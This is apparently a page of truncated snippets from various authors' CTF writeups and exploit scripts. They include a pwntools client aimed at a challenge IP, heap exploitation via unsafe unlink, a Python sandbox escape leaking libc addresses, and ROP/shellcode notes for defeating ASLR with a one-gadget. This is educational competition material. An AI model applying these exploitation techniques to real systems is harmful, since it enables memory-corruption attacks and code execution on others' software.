penafieljlm

struct Template {
	int64_t data_64;
	int32_t data_32;
	int16_t data_16;
	char data_char;
} value {
	// the x'es get instructions written onto them
	// notice that those instructions are nops
	//xxxxxx

kukfa

import idaapi
import idc


class HexJumpHandler(idaapi.action_handler_t):
    def activate(self, ctx):
        selection = idaapi.read_selection()
        valid_selection = selection[0]
        if (valid_selection):
            addr = idc.DbgDword(selection[1])

hasherezade

#include <stdio.h>
#include <windows.h>
#include "peconv.h"

const size_t g_flagLen = 26;
char g_flag[g_flagLen + 1] = { 0 };

int my_index()
{
    static int index = 0;

quangIO

package com.basicsec.demoweb

import io.jsonwebtoken.Jwts
import io.vertx.core.AbstractVerticle
import io.vertx.core.Vertx
import io.vertx.core.json.JsonObject


class MainVerticle : AbstractVerticle() {

JMdoubleU

h1-702 CTF 2018 Web Challenge Writeup

This is a writeup of how I went about solving the web challenge from the h1-702 CTF, including my thought process as I navigated through the wrong and right paths to reach a solution. If you're only interested in what the correct steps were, skip to the TL;DR at the end.

Upon navigating to the challenge URL, we're greeted with a message:

Notes RPC Capture The Flag
Welcome to HackerOne's H1-702 2018 Capture The Flag event. Somewhere on this server, a service can be found that allows a user to securely stores notes. In one of the notes, a flag is hidden. The goal is to obtain the flag.
Good luck, you might need it.

peternguyen93

#!/usr/bin/python
# Author : peternguyen

from Pwn import *

# p = Pwn(mode=1,port=8887)
p = Pwn(mode=1,host='52.193.196.17',port=56746)

def select(op):
	p.read_until('Your choice: ')

sroettger

#!/usr/bin/env python2
# -*- coding: utf-8 -*-

# The 300 challenge was a heap challenge that allowed you to make allocations of size 0x300.
# You could free allocations and read/write to them even after they got freed.
# The tricky part about the challenge was that you don't control the size and can't for example use the usual fastbin techniques.

# This exploit overwrites the check_action variable so that the libc doesn't abort on errors anymore.
# Afterwards we can get a write-what-where primitive using unsafe unlink.

hama7230

# import Collection
bytearray = ().__class__.__base__.__subclasses__()[5]

def p64(addr):
    x = '{0:016x}'.format(addr)
    return bytearray.fromhex(x)[::-1]


b = Collection.Collection({'1':0x1337})
libc_base = id(b) + 0xe27198 - 0x13e0dd0

HarDToBelieve

#include <stdio.h>
#include <stdlib.h>

#define chunksize 0x8
#define fakesize 0x20

#define SIZE_SZ (sizeof(size_t))
#define MALLOC_ALIGN_MASK (2*SIZE_SZ - 1)
#define MIN_CHUNK_SIZE 24 /* 64 bit system */
//#define MIN_CHUNK_SIZE 12 /* 32 bit system */

PaulCher

start

By using the so called universal gadget from __libc_csu_init we can read shellcode into the rwx memory segment and return into it.

start hard

By executing read function we can overwrite only last two bytes of read to find something useful and defeat ASLR. Fortunately there is one-gadget RCE located at 0xf0567 in this version of libc, right near the read function (0xf6670). We overflow only last two bytes to defeat ASLR, so that only around 16 attemps needed, because of 4 bit entropy of ASLR.

EDIT: checkout another great solution proposed by agadeint in the comment section below, which is cleaner and does not require bruteforcing and one gadget.